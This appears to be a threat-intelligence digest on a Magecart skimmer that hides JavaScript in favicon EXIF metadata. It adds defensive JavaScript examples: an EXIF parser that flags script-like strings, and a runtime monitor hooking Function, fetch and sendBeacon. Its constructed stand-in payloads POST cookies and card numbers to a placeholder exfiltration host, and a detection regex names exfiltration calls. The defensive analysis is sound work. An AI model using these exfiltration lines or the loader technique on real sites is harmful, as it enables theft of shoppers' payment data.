Magecart skimmer leverages favicon EXIF steganography in web supply chain attack chain
Summary
A recently observed Magecart skimmer uses a three-stage loader chain that hides its payload in the EXIF metadata of a dynamically loaded favicon. The chain runs entirely in the browser during checkout; nothing malicious ever lands in the merchant's source code or repository. Stage one fetches a script from a URL that mimics a Shopify CDN endpoint; that script assembles an obfuscated URL pointing at a favicon on attacker infrastructure (b4dfa5[.]xyz); the favicon is fetched as binary data, the JavaScript string is read out of its EXIF fields and executed with new Function(). Stolen payment data is then POSTed from the victim's browser straight to attacker-controlled servers, so the merchant's own servers never see the exfiltration. The campaign illustrates the blind spot of repository-centric static analysis: a tool that reads the codebase cannot see a payload that exists only in a third-party asset fetched at runtime and hidden in binary image metadata. Every stage is nevertheless an observable browser event (a script load, an image fetch, a dynamic code evaluation, an outbound POST to a non-first-party origin), which is why continuous client-side runtime monitoring is the control layer that catches this class of web supply chain attack.
Timeline
- 18.03.2026 13:58 (1 article)
Magecart skimmer campaign abuses favicon EXIF steganography to evade static analysis
A Magecart skimmer campaign was identified using a three-stage loader chain that hides its payload in the EXIF metadata of a favicon hosted on an attacker-controlled endpoint (b4dfa5[.]xyz/favicon.ico). The first stage fetches a script from a URL mimicking a Shopify CDN endpoint; that script builds the favicon URL from index arrays; the favicon is retrieved at runtime, the JavaScript string is decoded from the binary image data and executed in the browser via new Function(), and stolen payment data is POSTed directly to attacker infrastructure. The technique sits in the blind spot of repository-centric static analysis tools and requires client-side runtime monitoring for detection.
Sources:
- Claude Code Security and Magecart: Getting the Threat Model Right — thehackernews.com — 18.03.2026 13:58
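The third stage of the chain described above is a parsing problem: raw image bytes come back from fetch(), and the loader has to find the JavaScript string inside the EXIF structure before it can hand it to new Function(). The following is an added example, not code from the article or from the skimmer itself. It builds a minimal JPEG whose EXIF ImageDescription tag (0x010E, a constructed choice; a real sample could use any ASCII tag) carries a JavaScript string, then recovers that string with a small JPEG/TIFF walker. The same walker doubles as a defender's check over images a page loads at runtime: EXIF ASCII values that look like code rather than camera metadata are flagged. The payload string, the tag and the file layout are constructed for illustration.

```javascript
// Added example, not code from the article or from the skimmer itself.
// It shows the stage-3 mechanism: a JavaScript string hidden in an EXIF ASCII
// tag is recovered from raw image bytes. The same parser serves as a
// defender's check over images fetched at runtime. Payload, tag (0x010E,
// ImageDescription) and file layout are constructed for illustration.

// Constructed stand-in for a skimmer payload. It is only parsed, never run.
const SAMPLE_PAYLOAD =
  "fetch('https://exfil.invalid/c',{method:'POST',body:document.cookie})";

// Build a minimal JPEG: SOI, one APP1 segment ("Exif\0\0" + little-endian TIFF
// header + IFD0 with a single ASCII entry), EOI. No pixel data is needed to
// carry the tag, which is why such files are tiny and easy to overlook.
function buildExifJpeg(payload, tag = 0x010e) {
  const ascii = Buffer.from(payload + "\0", "latin1"); // ASCII values are NUL-terminated
  const tiff = Buffer.alloc(26 + ascii.length);
  tiff.write("II", 0, "latin1");        // byte order: little-endian
  tiff.writeUInt16LE(42, 2);            // TIFF magic
  tiff.writeUInt32LE(8, 4);             // offset of IFD0
  tiff.writeUInt16LE(1, 8);             // number of directory entries
  tiff.writeUInt16LE(tag, 10);          // entry: tag
  tiff.writeUInt16LE(2, 12);            // entry: type 2 = ASCII
  tiff.writeUInt32LE(ascii.length, 14); // entry: count (bytes incl. NUL)
  tiff.writeUInt32LE(26, 18);           // entry: value offset (8 + 2 + 12 + 4)
  tiff.writeUInt32LE(0, 22);            // next IFD: none
  ascii.copy(tiff, 26);
  const exifId = Buffer.from("Exif\0\0", "latin1");
  const app1 = Buffer.alloc(4);
  app1.writeUInt16BE(0xffe1, 0);                          // APP1 marker
  app1.writeUInt16BE(2 + exifId.length + tiff.length, 2); // length counts itself
  return Buffer.concat([Buffer.from([0xff, 0xd8]), app1, exifId, tiff, Buffer.from([0xff, 0xd9])]);
}

// Read every ASCII (type 2) entry in IFD0 of a TIFF block; both byte orders handled.
function parseTiffAscii(tiff) {
  const le = tiff.toString("latin1", 0, 2) === "II";
  const u16 = (o) => (le ? tiff.readUInt16LE(o) : tiff.readUInt16BE(o));
  const u32 = (o) => (le ? tiff.readUInt32LE(o) : tiff.readUInt32BE(o));
  const entries = [];
  const ifd = u32(4);
  if (ifd + 2 > tiff.length) return entries;
  const n = u16(ifd);
  for (let i = 0; i < n; i++) {
    const e = ifd + 2 + i * 12;
    if (e + 12 > tiff.length) break;
    const tag = u16(e), type = u16(e + 2), count = u32(e + 4);
    if (type !== 2) continue;
    const off = count <= 4 ? e + 8 : u32(e + 8); // values of <= 4 bytes sit inline
    if (off + count > tiff.length) continue;
    entries.push({ tag, value: tiff.toString("latin1", off, off + count).replace(/\0+$/, "") });
  }
  return entries;
}

// Walk the JPEG marker segments and collect ASCII EXIF entries from APP1.
function extractExifAscii(bytes) {
  const buf = Buffer.from(bytes);
  const out = [];
  if (buf.length < 4 || buf[0] !== 0xff || buf[1] !== 0xd8) return out; // not a JPEG
  let pos = 2;
  while (pos + 4 <= buf.length && buf[pos] === 0xff) {
    const marker = buf[pos + 1];
    if (marker === 0xd9 || marker === 0xda) break;      // EOI, or scan data begins
    const segEnd = pos + 2 + buf.readUInt16BE(pos + 2);  // length field counts itself
    if (segEnd > buf.length) break;
    if (marker === 0xe1 && buf.toString("latin1", pos + 4, pos + 10) === "Exif\0\0") {
      out.push(...parseTiffAscii(buf.subarray(pos + 10, segEnd)));
    }
    pos = segEnd;
  }
  return out;
}

// Defender's check: EXIF strings that look like code rather than camera metadata.
const JS_MARKERS =
  /\bnew\s+Function\b|\bfetch\s*\(|XMLHttpRequest|sendBeacon|\beval\s*\(|\batob\s*\(|document\.(cookie|forms|querySelector)/;

function findScriptLikeExif(bytes) {
  return extractExifAscii(bytes).filter((e) => JS_MARKERS.test(e.value));
}
```

The example builds a JPEG because EXIF is a TIFF-derived structure carried by JPEG, TIFF and a few other image formats, not by the ICO container; a response at a favicon.ico path that contains an APP1/Exif segment is therefore itself a content-type mismatch worth flagging, independently of what the strings say. The regex is deliberately narrow; in an asset scanner you would also record any ASCII tag above a few hundred bytes, since camera descriptions are short and skimmer payloads are not.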
Information Snippets
-
The initial loader dynamically fetches a script from a URL masquerading as a legitimate Shopify CDN endpoint.
First reported: 18.03.2026 13:58 (1 source, 1 article: thehackernews.com)
-
The fetched script assembles the next-stage URL from index arrays (string fragments selected by numeric index so the hostname never appears as a literal), which decodes to a malicious favicon hosted at b4dfa5[.]xyz/favicon.ico.
First reported: 18.03.2026 13:58 (1 source, 1 article: thehackernews.com)
-
The favicon is retrieved as binary data, parsed for EXIF metadata containing a malicious JavaScript string, and the string is executed via new Function(). EXIF is a TIFF-derived structure carried by JPEG, TIFF and a few other image formats, not by the ICO container, so a response at a favicon.ico path that carries EXIF at all is a content-type mismatch worth flagging on its own.
First reported: 18.03.2026 13:58 (1 source, 1 article: thehackernews.com)
-
Exfiltration occurs via POST requests to attacker-controlled servers, sending stolen payment data directly from the victim's browser; the merchant's own servers never handle the traffic, so server-side logs show nothing.
First reported: 18.03.2026 13:58 (1 source, 1 article: thehackernews.com)
-
The attack chain does not require any modification to the merchant’s source code or repository, relying entirely on runtime execution in the browser.
First reported: 18.03.2026 13:58 (1 source, 1 article: thehackernews.com)
-
Claude Code Security and similar repository-centric static analysis tools have no visibility into payloads injected into third-party CDN assets or hidden within binary metadata: they see what is committed, not what the browser actually loads and runs at checkout.
First reported: 18.03.2026 13:58 (1 source, 1 article: thehackernews.com)
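The snippets above list four runtime behaviours that static analysis cannot see: a dynamic script load, an image fetch from a non-first-party origin, code compiled with new Function(), and an outbound POST carrying card data. The following is an added example, not code from the article or from any monitoring product, of the client-side runtime monitoring the page calls for. It wraps the page's Function constructor, fetch and navigator.sendBeacon so that dynamically compiled code and requests to origins outside an allowlist are recorded, then runs a constructed stand-in for stage 3 against a fake page scope to show what gets caught. The page origin, the allowlist entries, the fake scope and the stand-in payload (which POSTs to the reserved exfil.invalid host) are all constructed for illustration.

```javascript
// Added example, not code from the article or from any monitoring product.
// A minimal client-side runtime monitor: it wraps the page's Function
// constructor, fetch and navigator.sendBeacon so that dynamically compiled
// code and requests to origins outside an allowlist are recorded. Page
// origin, allowlist, fake scope and stand-in stage-3 payload are constructed.

function installRuntimeMonitor(scope, pageOrigin, allowedOrigins) {
  const events = [];
  const originOf = (u) => {
    try { return new URL(String(u), pageOrigin).origin; } catch { return null; }
  };
  const record = (kind, url, method) => {
    const origin = originOf(url);
    if (!allowedOrigins.includes(origin)) events.push({ kind, method, origin });
  };

  // 1. Dynamic code: new Function(body) is how the skimmer runs the EXIF string.
  const OrigFunction = scope.Function;
  scope.Function = function (...args) {
    const body = String(args[args.length - 1] ?? "");
    events.push({ kind: "dynamic-code", preview: body.slice(0, 60) });
    return OrigFunction(...args); // a function returned from a constructor is what `new` yields
  };

  // 2. Outbound traffic: fetch() and sendBeacon() are the usual exfil channels.
  if (typeof scope.fetch === "function") {
    const origFetch = scope.fetch;
    scope.fetch = (url, init = {}) => {
      record("fetch", url, String(init.method || "GET").toUpperCase());
      return origFetch(url, init);
    };
  }
  if (scope.navigator && typeof scope.navigator.sendBeacon === "function") {
    const origBeacon = scope.navigator.sendBeacon;
    scope.navigator.sendBeacon = (url, data) => {
      record("sendBeacon", url, "POST"); // sendBeacon always POSTs
      return origBeacon(url, data);
    };
  }
  return events; // live array; the monitor keeps appending to it
}

// Stage 3 as the page describes it: compile the string recovered from the
// image with new Function() and run it. Here the string is passed in directly.
function runStage3(scope, recoveredJs) {
  const stage3 = new scope.Function("scope", recoveredJs);
  return stage3(scope);
}

// Constructed scenario: a fake page scope, one legitimate request, then a
// stand-in skimmer that POSTs "card data" to a constructed origin.
function demo() {
  const scope = {
    Function,
    fetch: (url, init) => Promise.resolve({ url, init }),
    navigator: { sendBeacon: () => true },
  };
  const events = installRuntimeMonitor(scope, "https://shop.example", [
    "https://shop.example",
    "https://cdn.shopify.com", // assumed legitimate CDN origin for this shop
  ]);
  scope.fetch("https://cdn.shopify.com/s/files/theme.js"); // allowed origin: not recorded
  runStage3(scope,
    "return scope.fetch('https://exfil.invalid/p', {method: 'POST', body: 'cc=4111111111111111'});");
  scope.navigator.sendBeacon("https://exfil.invalid/b", "cc=4111111111111111");
  return events;
}
```

In a real page the call is installRuntimeMonitor(window, location.origin, [...]) from the first script in the document head, before any tag manager or third-party script runs, with the events array shipped to a merchant-controlled endpoint. Two caveats a practitioner should keep in mind: this is telemetry, not a boundary, since a payload can still reach the original constructor through (function(){}).constructor or run inside an iframe, and only fetch and sendBeacon are hooked here; XMLHttpRequest, form submissions and image beacons need the same treatment. A Content-Security-Policy with strict script-src and connect-src lists is the complementary preventive control, because each stage of this chain is a request to an origin the merchant never intended to load from.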